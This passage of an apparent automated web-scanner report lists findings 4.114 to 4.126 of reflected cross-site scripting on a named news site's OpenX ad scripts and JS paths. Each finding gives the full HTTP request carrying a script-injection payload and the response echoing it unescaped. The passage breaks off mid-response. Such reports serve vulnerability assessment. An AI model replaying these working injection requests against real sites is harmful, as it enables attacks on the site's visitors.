User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:57 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openxb7ab3"><script>alert(1)</script>471d70f85ea/www/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type
...[SNIP]...
4.114. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd78"><script>alert(1)</script>5b16b6a2009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www5dd78"><script>alert(1)</script>5b16b6a2009/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:02 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www5dd78"><script>alert(1)</script>5b16b6a2009/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hi
...[SNIP]...
4.115. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee416"><script>alert(1)</script>a1aafb63781 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/deliveryee416"><script>alert(1)</script>a1aafb63781/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:12 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/deliveryee416"><script>alert(1)</script>a1aafb63781/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hidden" />
...[SNIP]...
4.116. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d3b"><script>alert(1)</script>df421e28eab was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery/ajs.php94d3b"><script>alert(1)</script>df421e28eab?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:16 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery/ajs.php94d3b"><script>alert(1)</script>df421e28eab?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hidden" />
...[SNIP]...
4.117. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51e2"><script>alert(1)</script>c2c4fe2a9a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openxf51e2"><script>alert(1)</script>c2c4fe2a9a2/www/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:29 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openxf51e2"><script>alert(1)</script>c2c4fe2a9a2/www/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2
...[SNIP]...
4.118. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28677"><script>alert(1)</script>d4080b8fe97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www28677"><script>alert(1)</script>d4080b8fe97/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:33 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www28677"><script>alert(1)</script>d4080b8fe97/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2F
...[SNIP]...
4.119. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cdf2"><script>alert(1)</script>cdc8a4f2b76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery3cdf2"><script>alert(1)</script>cdc8a4f2b76/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:42 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery3cdf2"><script>alert(1)</script>cdc8a4f2b76/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fsh
...[SNIP]...
4.120. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e317"><script>alert(1)</script>d1da29fd1e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery/lg.php5e317"><script>alert(1)</script>d1da29fd1e0?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:48 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery/lg.php5e317"><script>alert(1)</script>d1da29fd1e0?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40
...[SNIP]...
4.121. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22431"><script>alert(1)</script>39b00191ec0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src22431"><script>alert(1)</script>39b00191ec0/languages/tr/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:45 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src22431"><script>alert(1)</script>39b00191ec0/languages/tr/messages.js" type="hidden" />
...[SNIP]...
4.122. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92e21"><script>alert(1)</script>f034d66f85a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages92e21"><script>alert(1)</script>f034d66f85a/tr/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:53 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages92e21"><script>alert(1)</script>f034d66f85a/tr/messages.js" type="hidden" />
...[SNIP]...
4.123. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b62b0"><script>alert(1)</script>d0f3b71f96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages/trb62b0"><script>alert(1)</script>d0f3b71f96/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages/trb62b0"><script>alert(1)</script>d0f3b71f96/messages.js" type="hidden" />
...[SNIP]...
4.124. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88615"><script>alert(1)</script>175578b2d1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages/tr/messages.js88615"><script>alert(1)</script>175578b2d1c HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:16 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages/tr/messages.js88615"><script>alert(1)</script>175578b2d1c" type="hidden" />
...[SNIP]...
4.125. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71af9"><script>alert(1)</script>54fe96e1c71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src71af9"><script>alert(1)</script>54fe96e1c71/scripts/tools.js?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:52 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src71af9"><script>alert(1)</script>54fe96e1c71/scripts/tools.js?nocache=2" type="hidden" />
...[SNIP]...
4.126. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29665"><script>alert(1)</script>4685965d83d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/scripts29665"><script>alert(1)</script>4685965d83d/tools.js?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:58 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
